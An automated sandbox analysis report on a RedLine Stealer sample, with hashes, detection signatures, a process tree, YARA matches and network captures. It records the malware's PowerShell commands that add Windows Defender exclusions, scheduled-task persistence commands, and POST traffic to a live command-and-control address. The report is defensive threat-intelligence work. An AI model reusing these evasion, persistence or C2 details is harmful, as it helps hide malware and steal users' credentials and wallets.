Windows Analysis Report
RgIbrhxoEx.exe

Overview

General Information

Sample name:RgIbrhxoEx.exe
renamed because original name is a hash value
Original sample name:304ea6d5cf3786d19de14f004d7d057a.exe
Analysis ID:1483367
MD5:304ea6d5cf3786d19de14f004d7d057a
SHA1:d86ddb3becc0a82c915be35e7a7dcd796b50c269
SHA256:89dd158d0ffdb6d661672343d36f5a87907e1cc60a0e9e85c892f75228eb399b
Tags:exe, RedLineStealer

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RgIbrhxoEx.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
    • powershell.exe (PID: 5532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5656 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RgIbrhxoEx.exe (PID: 3620 cmdline: "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • LjGABleGAy.exe (PID: 1880 cmdline: C:\Users\user\AppData\Roaming\LjGABleGAy.exe MD5: 304EA6D5CF3786D19DE14F004D7D057A)
    • schtasks.exe (PID: 7388 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LjGABleGAy.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\LjGABleGAy.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.57.151:55615"], "Bot Id": "cheat"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
0.2.RgIbrhxoEx.exe.3e22b60.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.RgIbrhxoEx.exe.3e22b60.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.2.RgIbrhxoEx.exe.3e22b60.3.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.RgIbrhxoEx.exe.3e22b60.3.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147ee:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147cf:$v2_6: GetUpdates
10.2.LjGABleGAy.exe.4263440.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", ProcessId: 5532, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, ParentImage: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, ParentProcessId: 1880, ParentProcessName: LjGABleGAy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", ProcessId: 7388, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", ProcessId: 5656, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", ProcessId: 5532, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", ProcessId: 5656, ProcessName: schtasks.exe
                    No Snort rule has matched
                    Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
                    2024-07-27T04:12:23.889248+0200 | 2045000 | 55615 | 49709 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:59.540993+0200 | 2022930 | 443 | 49719 | TCP | A Network Trojan was detected
                    2024-07-27T04:12:18.578362+0200 | 2849352 | 49708 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:18.878917+0200 | 2849662 | 49709 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:27.258175+0200 | 2045001 | 55615 | 49709 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:20.154106+0200 | 2848200 | 49711 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:18.200600+0200 | 2045001 | 55615 | 49706 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:27.715047+0200 | 2849352 | 49718 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:14.694601+0200 | 2045000 | 55615 | 49706 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:09.597710+0200 | 2849662 | 49706 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:24.113320+0200 | 2849351 | 49709 | 55615 | TCP | Malware Command and Control Activity Detected
                    2024-07-27T04:12:21.374284+0200 | 2022930 | 443 | 49710 | TCP | A Network Trojan was detected
                    2024-07-27T04:12:14.910173+0200 | 2849351 | 49706 | 55615 | TCP | Malware Command and Control Activity Detected

                    AV Detection

                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["185.222.57.151:55615"], "Bot Id": "cheat"}
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe | ReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe | Virustotal: Detection: 43%
                    Source: RgIbrhxoEx.exe | ReversingLabs: Detection: 83%
                    Source: RgIbrhxoEx.exe | Virustotal: Detection: 43%
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: RgIbrhxoEx.exe | Joe Sandbox ML: detected
                    Source: RgIbrhxoEx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: RgIbrhxoEx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | Code function: 4x nop then jmp 01327E61h | 0_2_01327375
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exe | Code function: 4x nop then jmp 01327E61h | 0_2_01327490
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe | Code function: 4x nop then jmp 03057329h | 10_2_0305683D
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exe | Code function: 4x nop then jmp 03057329h | 10_2_03056958

                    Networking

                    Source: Malware configuration extractor | URLs: 185.222.57.151:55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknown | Network traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 185.222.57.151:55615
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 185.222.57.151:55615 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: 185.222.57.151:55615 | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 185.222.57.151:55615 | Content-Length: 961769 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 185.222.57.151:55615 | Content-Length: 961761 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 185.222.57.151:55615 | Content-Length: 961280 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 185.222.57.151:55615 | Content-Length: 961272 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                    Source: Joe Sandbox View | ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknown | TCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 185.222.57.151:55615 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.57.151:55615
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.57.151:55615/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.57.151:55615t-
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2217562708.0000000003226000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003100000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
